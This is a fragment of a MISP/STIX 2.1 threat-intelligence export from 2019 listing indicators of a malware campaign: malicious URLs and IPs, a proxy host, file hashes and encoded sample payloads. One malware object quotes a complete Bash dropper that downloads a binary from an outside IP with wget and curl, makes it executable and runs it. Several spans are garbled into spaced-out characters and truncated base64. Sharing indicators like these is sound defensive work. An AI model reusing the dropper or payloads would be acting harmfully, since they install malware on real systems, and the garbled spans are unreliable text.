J O r a Q 92 B / 1 v L N T Z 6 M B R 3 l R + T 3 k f + U / f Z q p w W P G 3 g s B k M / J f 2 p O n t Q a y G t Y h x g i e w j Z U 1 V t 8 V E 51 V f C T e a a 2 X 9 x 8 T a p 1 B y D d H x S s S d B n U a L Z P j w O 38 y 8 Y 6 G 2 U i F 7 Q d M 0 Y 6 m M 20 F j J X c N 9 h a g u R A 7 q h 9 O o 2 L d E m f 0 y V A l M F Y b 3 t K 60 Q B O r c D n M e a 2 o T S q 1 c Y + V 4 F v t K A t N 238 B R e o b I t W d W j 7 D 8 K s h n 8 + 2 q f v q o A 9e5 X y M f J u R q I Z Y X K + p l Y D + v s m X k T b + 2 n e s r J E w Z r i y 6 K f O T k w G Q p e n a f n o V + z P a W V N k c 0 o D W v w y q A L A l M 9 b l x a M y Z i F k O f R G j Y M y u 1 J F L l e R e D e X e l P z j R o J 8 W C 9 p s o D 7 x Z U 214 s 8 R M g n J c 5 p W b E P W 8 z 6 H g y V I u F 0 v l Y v Y u A q l 3 Y d m F l F S + D I a f w Y t 77 i B z O S N Y + D C 8 F / u S I A C e n A w v f Q w J m Z 1 G U v z N + w m o x d 8 p j Q c Z r f 0 d t 15 H Z b / k M 6 M e w K / 5 M B M H L V N g i Y y / 95 C j z K O b 2 b U / o X c c v h E I K D X 20 H t 0 u y 5 q h O l s E G c 5 O u c b / z Q 3 Z P O Q w 3 g R d 2 f g G L r 4 w C G R 1 X 4 E e U N k 895 s Z 8 T B s E K v b P / E h O j l o f d 8 k v o Q i V a x D R z P n G U V r 6 L 3 S r Y h W 8 C 2 s m r a C q c p i n e 1 Q E Q K 4 z S h Z B e M j h p R M T r M U B / h m T 8 t O H c 3 o U K M w i b A m e d e V H o P r k Z F o 8 z P A L A b b 3 q x Q 5 T x 4 B c O Z X 4 b w 0 x l t L o N p T R j S K y F H 9 H 8 j 3 b n G u 6 i L J Z 4 e i J 0 8 C s / j b w N 0 b w W / U u W U Y T 7 G I h p f w i 2 V q o j a w I X E 0 9 E p 3 v L P G C K U h + J 6 U T h 4 G h w l E s A X r r q 7 z h l l f y g z 3 + N P 2 H g 2 L Z 0 1 J G X 1 N g A Z Q c S r E L j c q K C t Z 5 j + H S g k d Q u g P T Z e l r V B I J N v j 8 s / Q H 9 s M z 1 E i 3 v j y V r J m H l 3 A A G r 7 v 728 Y c 7 d 3 w S M x 7 A W W b 4 e y E Q / D i A i t 2 Q 1 l P J V D a G N n X m F 31 b o t 7 H H G S U r X Z y W p 3 K 18 p b q 97 R o 2 m W q n W 1 g k 3 k 7 G q / V u Z Q C v u c V b w H C V k 7 u e l 5 d w p Q Z g V i 1 z d d Y u H o s h h t o c h E J I g v C n U / c 5 m e m L v Y U i q 6 V W e r S 4 i U t F d i O i 0 I U 4 U d V J a h s 1 z J B w P K h C N h w u f 46 U u v A K s 0 E u X R u 6 z 8 W Y d p l J g g n i f y J a 7 / K 4 + G 9 e e s B B 4 R P D H J h A 8 h g Z j f 2 r g A L W n m 8 n E 8 u X g N n G W A F x f t D V o z q C s L x n O 8 j 3 R 0 v 0 N T z 2 m C W 8 t d 0 N A M / u 3 O g n t f t K I 4 y Z 6 o s I e K E / F 8 L R 4 C A 2 k V q k X K M B f i 8 N t l 9 a + k y 3 Y N d 6 B C F E O C s 72 / Z o j D l N P k x 4 b x i j o o c Y W P s M K l Q 6 i i h n 0 V c D + C L N w z 7 S 8 j Z M D D C 1 b 5 L q f k 5 V P 7 y o W F 3 U M + f R / u N w H p t Q p L 6 R y L Z 3 / B + j 5 E r E p d a d X U U 3 v n u h 8 K 716 N u u E G 2 C I X p w r q 4 T S l m R v + 4 R M i H l m / t c A a t D 46 Z V 1 h p L H 8 j n 0 z l I 89 r V k X 1 M g i Z d F 7 l + 3 C A s U L 77 b t d 5 m k U h D S n Y 8 X D t 5 J q r z B c S L t Y a F I 3 d b G 6 I n m 5 V g K 4 z k g 2 Z A G s B H C 34 D I q L B m 6 Z n V X w 0 X + o Q 15 l g W E D v J w Z R R T B 2 D n o V o i x U m b I K W N z f C d b F / H c 6 M n w b z k h / f D u 944 K l I l 1 B z Z u S h Q y N k 9 Q 9 z x c X C 2 x d 8 x h E g T O Q d 3 d n 7 d p q 0 x H 0 S / L Z 6 X A Z t c Z O W 9 l k u S S s g f D o I x 64 p y F D a F d + o O 1 Q r I Y d 10 M K A m 6 N L M Z T z B P n l c / G b J C 1 Q C F R Y c 59 S i O h S 4 s 0 7 Z 1 P 30 o 0 q j h / i v Y i R Q V R G R d o 8 X E v f i F F T c X C Q T C r 0 O d O E 0 q / B 16 N J d h z N B + z L n H 3 s P 1 W y D O E c Y / F h v p 2 S 4 k p r Q n n L I k 3 / C Q c F v a m z e a y z 1 t + 7 l h C Q + B j f x a p u k c 5 l U r U 36 Q Q S B u D c L 40 p Q p 5 u 4 c d k T h 3 y K / y c N g d J y K 3 n X T q 0 g y c F 2 y b H e D 7 k O N C N / 2 t I S J f P 4 + h E P m x e T j z w 4 L a C 3 k A l e x H p P I R Q Z T d C h b 1 w F p q 2 T R O 8 B r T L 8 X l k F f d / K N t m 87 V X + g / U n R V F Q 4 a D K + Y 0 J a Z u a 2 y I O g k v e H O j P T s f Z D R H o K t L E Z q Y H k L + a o c g A Y S i e N u Z 19 L E 8 G 0 w k n a R S f n q b W M c G 7 I 1 a w y Q Q Z B 942 V P F T n 8 C u M A N X i Y s h 3 N s k 3 r K 6 H B g a z t C P m I K e Q X u t h U E 0 i F / e C E t D q v C b b 4 j k T 4 i 0 T I u H Q 7 V P K t E Z / t 5 j N + j P s L 0 P b V a Y X b l o p 5 P f O B d o G / 0 k v T L 0 n Z 4 p L Y o 8 Q e w F j v Y f q r K A s Y m k 4 t M l 4 F B 7 D L W Q T S o Q p n / B K u o 0 Y 0 J 5 y V Q V Q u 5 b k t u G G y f g g b W E M 6 l C P 0 p E Q 8 x H b x W A I U 6 X N Q l b w 4 C B B n y 5 v Z 2 O x p Y k E m g r b E 0 I 5 a 68 b 6 r i Z D l U K n T 5 b p 1 m o c L I q r y 8 K C n c y 8 T Z u o m A O u X Y 6 O / 6 u E 5 O w V 7 i / Y E g 94 f x h 7 E X w X 9 o W g v a a 8 M m w 0 G z h z q 8 K h q 7 E K B I U W c S E O c k q u D v S 1 u 9 J J 31 a I A v f S U q h m s X H Z B o V + p y Q E S W a Q y b y y A I I M h R H O + y g D E h r a E q D 2 E Q 36 + G G 39 E X d l p h D m l Q C E r c 0 q B y 4 V f 7 l u V d a 11 r w H z z E 2 N W U t 6 b j w 70 v Q 69 d + j v i g F H t b r a K Z B p g 61 K u 6 i 3 E a r x N n 0 H 1 v I h k g e V 2 i k L I x 8 X o 13 c m b c 8 p 5 Z E t j T 5 M a q A Y b 9 T l Q S Q H z L P l 5 C A q n r S b T e B 6 F 0e2 T E l 0 C 8 e E x w 1 G v J J y M T 7 Z t N 8 t c H r O W 3 B Q u A 7 j q I I s B 6 f v j 2 K N x w s n D C w g g 5 g J k g / j e 7 u d C C s 43 z P K P g 2 B P o e 7 N t a d f C m y O j + 0 v s 1 J q n A a i R 1 O W g O 5 z + n d G 31 j 0 + 4 y 4 j 72 m Q G p 5 i k r j b 7 p E f l / l S z k Y r v R J A I e r S s w 9 c x 5 r z N d J k O 7 w 3 U b m 1 O 6 V b b b 5 F B L 3 H W b z U N t 0 97 l U K Z 6 P J x O s H L + F L p a S F 3 K R t Z M K H v x h k m m E l i T P e T S Y S + 0 q t / s h y r V K H J k m 1 U r K a w m H O O H V 5 P o x y 4 T 0 G 5 m e S u K 8 s 5 T E Q Q k 6 L w S W R e w C f F 5 x T N y m C Z U 54 G v H N n Z r 1 R e X k l S P U L r j k 6 L 9 r t n A P b b k 1 r i 2 O v 1 Z 26 y e c a / 9 e Z q + T l n L N j N a I H 1 e P u w K r 22 h i A M / I j H O G G T o U 5 v N D R l G b v M q 8 v S j 3 w j R B h X N y U x m e o q Y 6 / R 6 s 94 N V z M m k 9 K b s + e r p 9 l d h q T w v f S o p O h i q 9 T C v g i w v L 1 T c c / G / A L 99 w k 3 s A p L d U 8 a 3 v y I z 7 e a F I j H 3 Z a F 2 Y a X l C i j K L w + S j K a a T i 6 D w N W H N 7 L s Q i H g m c t 8 f X y 73 Q d b Y f X t v z x i M p L t P 5 G s T r h H 71 L D Q L J K 1 E L l 5 y J 2 Z E i k g
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2019-06-01T08:28:07Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "file"
}
] ,
"labels" : [
"misp:name=\"file\"" ,
"misp:meta-category=\"file\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5cf237b6-06bc-4e57-ad7e-31bb950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-06-01T08:30:46.000Z" ,
"modified" : "2019-06-01T08:30:46.000Z" ,
"pattern" : "[url:value = 'http://87.236.212.237/tmp/ofd' AND url:x_misp_host = '87.236.212.237' AND url:x_misp_scheme = 'http' AND url:x_misp_resource_path = '/tmp/ofd']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2019-06-01T08:30:46Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "network"
}
] ,
"labels" : [
"misp:name=\"url\"" ,
"misp:meta-category=\"network\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "malware" ,
"spec_version" : "2.1" ,
"id" : "malware--5cf23812-2ae8-4feb-8e8b-4a1f950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-06-01T08:35:54.000Z" ,
"modified" : "2019-06-01T08:35:54.000Z" ,
"is_family" : false ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "misc"
}
] ,
"implementation_languages" : [
"Bash"
] ,
"labels" : [
"misp:name=\"script\"" ,
"misp:meta-category=\"misc\"" ,
"misp:to_ids=\"False\""
] ,
"x_misp_script" : "#!/bin/sh\r\nid1=\"fkbgh\"\r\nid2=\"jm\"\r\nif [ -x \"/tmp/\" ] && [ -w \"/tmp/\" ]; then\r\nwget -O /tmp/`echo $id1` http://185.165.169.6/jp/`echo $id2`\r\ncurl -o /tmp/`echo $id1` http://185.165.169.6/jp/`echo $id2`\r\nchmod +x /tmp/`echo $id1`\r\nchmod 7777 /tmp/`echo $id1`\r\n/tmp/`echo $id1` &\r\nelif [ -x \"/var/tmp/\" ] && [ -w \"/var/tmp/\" ]; then\r\nwget -O /var/tmp/`echo $id1` http://185.165.169.6/jp/`echo $id2`\r\ncurl -o /var/tmp/`echo $id1` http://185.165.169.6/jp/`echo $id2`\r\nchmod +x /var/tmp/`echo $id1`\r\nchmod 7777 /var/tmp/`echo $id1`\r\n/var/tmp/`echo $id1` &\r\nelif [ -x \"/dev/shm/\" ] && [ -w \"/dev/shm/\" ]; then\r\nwget -O /dev/shm/`echo $id1` http://185.165.169.6/jp/`echo $id2`\r\ncurl -o /dev/shm/`echo $id1` http://185.165.169.6/jp/`echo $id2`\r\nchmod +x /dev/shm/`echo $id1`\r\nchmod 7777 /dev/shm/`echo $id1`\r\n/dev/shm/`echo $id1` &\r\nelif [ -x $JBOSS_HOME ] && [ -w $JBOSS_HOME ]; then\r\nwget -O $JBOSS_HOME/`echo $id1` http://185.165.169.6/jp/`echo $id2`\r\ncurl -o $JBOSS_HOME/`echo $id1` http://185.165.169.6/jp/`echo $id2`\r\nchmod +x $JBOSS_HOME/`echo $id1`\r\nchmod 7777 $JBOSS_HOME/`echo $id1`\r\n$JBOSS_HOME/`echo $id1` &\r\nelif [ -x $HOME ] && [ -w $HOME ]; then\r\nwget -O $HOME/`echo $id1` http://185.165.169.6/jp/`echo $id2`\r\ncurl -o $HOME/`echo $id1` http://185.165.169.6/jp/`echo $id2`\r\nchmod +x $HOME/`echo $id1`\r\nchmod 7777 $HOME/`echo $id1`\r\n$HOME/`echo $id1` &\r\nelse\r\nwget -O `echo $id1` http://185.165.169.6/jp/`echo $id2`\r\ncurl -o `echo $id1` http://185.165.169.6/jp/`echo $id2`\r\nchmod +x `echo $id1`\r\nchmod 7777 `echo $id1`\r\n`echo $id1` &\r\nfi" ,
"x_misp_state" : "Malicious"
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5cf238a2-0e5c-447e-a584-4072950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-06-01T08:34:42.000Z" ,
"modified" : "2019-06-01T08:34:42.000Z" ,
"pattern" : "[url:value = 'http://185.165.169.6/jp/']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2019-06-01T08:34:42Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "network"
}
] ,
"labels" : [
"misp:name=\"url\"" ,
"misp:meta-category=\"network\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5cf2397c-b0a0-475d-b764-4c2a950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-06-01T08:38:20.000Z" ,
"modified" : "2019-06-01T08:38:20.000Z" ,
"pattern" : "[url:value = 'http://87.236.212.237/tmp/ofd' AND url:x_misp_scheme = 'http']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2019-06-01T08:38:20Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "network"
}
] ,
"labels" : [
"misp:name=\"url\"" ,
"misp:meta-category=\"network\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5cf23a31-1db8-4b41-81af-4416950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-06-01T08:41:21.000Z" ,
"modified" : "2019-06-01T08:41:21.000Z" ,
"description" : "Used as proxy" ,
"pattern" : "[url:value = 'http://41.203.146.142:8080']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2019-06-01T08:41:21Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "network"
}
] ,
"labels" : [
"misp:name=\"url\"" ,
"misp:meta-category=\"network\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5cf23ef7-5138-4a1f-b773-4766950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-06-01T09:03:10.000Z" ,
"modified" : "2019-06-01T09:03:10.000Z" ,
"pattern" : " [ f i l e : h a s h e s . M D 5 = ' 9 a e 7 d c 5 f f 13526e8 c c 5 b 8 c 236066 a 828 ' A N D f i l e : h a s h e s . S H A 1 = ' 69 a f 27 d 553292952e4 d 93338 c 44 b 0 f 4e66 a 15470 ' A N D f i l e : h a s h e s . S H A 256 = ' 3 d 0 2 b b d d c 185352 d d c 1 d e a 20 f 54e2 f 2 b 39 f 180 a 9 b d 26 d 8453 b 5 a d 7 b 983466 c 95 ' A N D f i l e : n a m e = ' 3 d 0 2 b b d d c 185352 d d c 1 d e a 20 f 54e2 f 2 b 39 f 180 a 9 b d 26 d 8453 b 5 a d 7 b 983466 c 95 ' A N D f i l e : s i z e = ' 58088 ' A N D ( f i l e : c o n t e n t _ r e f . p a y l o a d _ b i n = ' U E s D B B Q A C Q A I A D Z I w U 6 C x K l J g N 8 A A O j i A A A g A B w A O W F l N 2 R j N W Z m M T M 1 M j Z l O G N j N W I 4 Y z I z N j A 2 N m E 4 M j h V V A k A A / c + 8 l z 3 P v J c d X g L A A E E I Q A A A A Q h A A A A R y g P Q / f / V I i 0 w i I I X U v K k t f J X L 5 w Z u Y l C n d 8 f 36 y R 4 H g k X g p w I S q K a z C i 2 q o J 91 S z T M X O y / 1 h O 6 A M 9 S r a Q P Y J s i J P V A a 4 l f 7 B 3 J 2 Y M M c k s E U q q q O x j x B y 5 K 7 B 9 n 9 s W n N H Y 2 L C f 9 V 6 y Y x x K h Z x J g m f m 9 g o 8 t i K t t C C 2 s J 9 D y E r m E Q 0 5 Z k 4 Z D T R j F t w t l P y K Z q 4 k t L S D C M m n C n S g n 0 i K B / Q f d l T w 73 u u f x e b k 5 l p G 5 E N A K W E M 5 q T n 9 b Z x l x M 8 h 6 P 8 H 9e4 + y / B s X + 0 j / u 75 Y Z y w 0 M O w 4 j F u i b 9 X 0 x f f d v f c c s u 0 g l p C n M N I 51 x t 0 x q D t A y B X e X 5 s 8 j f f C 5 U q 4 G u 4 t m Y 8 M r / g o h S E I U r u I R t q 4 G h 3 Z j 68 s Y l e a / Z q 6 I t K R t m Y 2 V F L p c w 8 Y R 8 E P E s L U h J v T Y n 1 b E O 6 S z u j e h x R z 69 M f 3 Y j C h h D R d W L J 43 t E v 0 j / e 1 G d q b j z o F P d j v H B Q 9 S L 0 y x M M + 3 x k k O Q Y W c H S p t P n F D L R Y Y N B h 1 f g 823 z u v p c M O u K a k N y q N + 28 I F T i X b M A N i s k v o 380 K a h J z G N B M 8 m / 8 x j 388 M I b O h r K J E V 0 3 y H K X n C B / C V 4 O + g y z s 4 F N v T c D v / p p O c 9 C C y a j F P k 3 j c C 8 k E f n W B K Y I 5 l g D M v / a 0 t k Z w W H 50 h t A 6 Z y t k p G c A H c e i p L 3 + e y e G n y S O x D L L f p b h / d A u J v O h D b K P E j E V Q E s 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
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2019-06-01T09:03:10Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "file"
}
] ,
"labels" : [
"misp:name=\"file\"" ,
"misp:meta-category=\"file\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5cf23fe9-25c8-47df-a38a-4325950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-06-01T09:05:45.000Z" ,
"modified" : "2019-06-01T09:05:45.000Z" ,
"description" : "Most probably compromised host" ,
"pattern" : "[(network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '45.77.54.157')]" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2019-06-01T09:05:45Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "network"
}
] ,
"labels" : [
"misp:name=\"ip-port\"" ,
"misp:meta-category=\"network\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5cf24083-6de0-42e3-9ae7-4129950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2019-06-01T09:09:51.000Z" ,
"modified" : "2019-06-01T09:09:51.000Z" ,
"pattern" : " [ f i l e : h a s h e s . M D 5 = ' f 0 49 a e 13406 f d e b a d b 10960 b c 0 d e e e 87 ' A N D f i l e : h a s h e s . S H A 1 = ' d a 0 5 b 42311606 e a a 0 3 c a 8 e d d 6 a 94 f f 2 e a c d 44 c 2 b ' A N D f i l e : h a s h e s . S H A 256 = ' 62 c a 3 f d 0 70 d 6447e844 c 76e4 b e d c c e 908 a 18 b c 275 c 1 a 713415 d 11838 b 1 c b 5 f 0 4 ' A N D f i l e : n a m e = ' s l p r ' A N D f i l e : s i z e = ' 88728 ' A N D ( f i l e : c o n t e n t _ r e f . p a y l o a d _ b i n = ' U E s D B B Q A C Q A I A A p J w U 42 q U O 0 S F U B A J h a A Q A g A B w A Z j A 0 O W F l M T M 0 M D Z m Z G V i Y W R i M T A 5 N j B i Y z B k Z W V l O D d V V A k A A 4 N A 8 l y D Q P J c d X g L A A E E I Q A A A A Q h A A A A P s 7 n q U q 9 A J q p 23 W J k v 8 f 4 t 1 K n g C I W D a I t L D m 6 e B I x k 256 s 9 p 85 E k E b w X B H 1 S / R n m 813 O V 2 / o w 5 r X h a q / w k i Q m T v A D j u T b W n G 6 G 5 b x R X f l d t 5 k o 85 b M N l U k D Q 4 R u K U G X G Z n 3 O M / e i 0 E G v l F N W 3 D u 9 l c Q z G A m / d 4 e Y R g I / x m + W n A Y D 7 K K W 2 g M S T v M Y U U e y Y / A I F w 0 R f c G I X 0 C N G 3 u B M s i 1 T f W p S t u v 5 q h K I O 7 I d r 4 e a 9 H t G u 84 S Q l g 5 r b c W n I o d w k a 6 d V 0 f f H a r g 17 X E K + l P R y l d B h C j O Z A Z f Y M Y z G B Q O R 0 X T 6 H / a f c F d I z g X 9 j Q u S U 8 / O 7 M R T f I d C d 8 f 22e5 i x c m m 8 C L c 6 o 9 J I W G M L 9 w 74 u w z 96 X R m J I 0 2 D 1 P n D l k t X z R C X A k a O r M 6 X X D w w 1 H p 9 a 26 K U K r 0 4 b M b c W l E N u U y K B t s 4 o g I 8 E v P 5 T 1 p B d S 1 t m b + q f j W U 3 j + v K H I 0 v a u X B c P 1 r j m 2 z t D D 3 z F j 4 W 7 O h n n B K L D A 3 e I g 2 s T w O G / 5 F + j 0 + 3 K l w D 4 b L K t y L + R J Z m f G 5 d 5 U o n f 9 Q q N i k K J J z Q w T N s J J g + p j N R m k k 3 Z 7 K x Q G e 0 7 z H K 3 a S o B E i v w i + n B 10 N 6 p P q D 9 I O 88 a q Y L r Q B S N g f K N w V z B 9 H Z B i h a P G s m z O g j V T v t p M + q Y h 84 x 6 n 0 F o 3 D a B s 3 j q V I 9 G y d / Q q G 4 L U Q 11 + Q / g G C U 7 x r r s H j K 3 N o a G 1 A q q r a G I g n Y Z a Y J a n 5 D T Q 5 j I G u p + 5 g F U h j y k H G m b H r Z 6 q 6 I z A A + V 3 J o I v n e I j / q V D / w F i v c R 8 + j / U 4 w o v Z Q U 9 a Y U M x B 8 J 8 W f F l W 5 d D 4 X 9 N / C P a w R 9 P E 9 I G w / x f X g b D U 2 M v T 6 F V q C 7 / m k t 4 v I R K B s e A F N J 1 C c 148 P 2 J x h 124 T S X 0 c 9 B V w 9 A Z j M 0 K 1 D r z p n x N j + D I Q / P 3 U s Y z o m 13 F L F 8 r f u X 1 R N R R h S s x h R 67 L 0 T 95 Z s U i u k V N y y b r j r C g N H e y v J E 1 o L M S f V b Z v C m P 3 n p k x H A i n z l y 19 G g I o V i g h f l 1 t Y T a Y I z v q X e B m i a 5 F R I B m z Q 9 g 1 h x 6 U N i g u C x L L p A X M U h R I F + a B R f g m C m 9 n N d O j b R V Y M e c z s O t i G b I q E o P Q y a H 2 / s A 1 x F N 0 1 V y i k d n j v + x p j 5 Y Z m G 76 b o V 3 w l d 7 e a u B C z V X l K H u 43 k m f z N R J A q o X E i I 1 D k K 5 N z h L Z E l X J g K p E h 2 D Q U F D + K j c k R P q c 7 W T z m Y U D V U S u Z K g 8 I E d A k t 35 b q a b m v a c b 1 X n B h G P Z u 5 F 7 C K h t M 1 t r 67 J M h Q 68 g x T r v K s 9 L X K c 7 H A R U + N m Z e Q 39 G D 8 / q A Q p W Z c K n z b b f y h G Q a a u S c S w f g l l T 2 T s h u Y v E N k s e h w 1 k c q D 9 s m w C 3 p D Y A t K 7 b j / t n H T 93 / M 0 T l H r q r A s U b R 1 g 85 W 5 M U g Z u 1 R x l 2 q 8 I M T + 33 p 1 t 6 F p o H d Z G B 3 G d 92 t T T R 8 l T E E R 7 R f e q r 1 f Z h P 1 e T O A 9 y d a 7 o v w R L X p j M T 5 U Y X v Y 39 R J R n K m V 8 D n 6 q O y g H H I Y 0 M 17 b / 1 V J m h k G Y W C E o A t 3e0 C Z 638 H P 0 l P d Q I D l W / f a G W E D w u 49 y N B + S B 5 w q K T W K K T q 6 J b L S l D c P i B X x J l U u q H s n q F 1 y A 6 g 2 t 2 u q h X L p Z f 1 N B D K u y c O P s j j s b z i G H F x G M B D v Z I 1 l j W 9 U E 5 b M g b + l e F q A 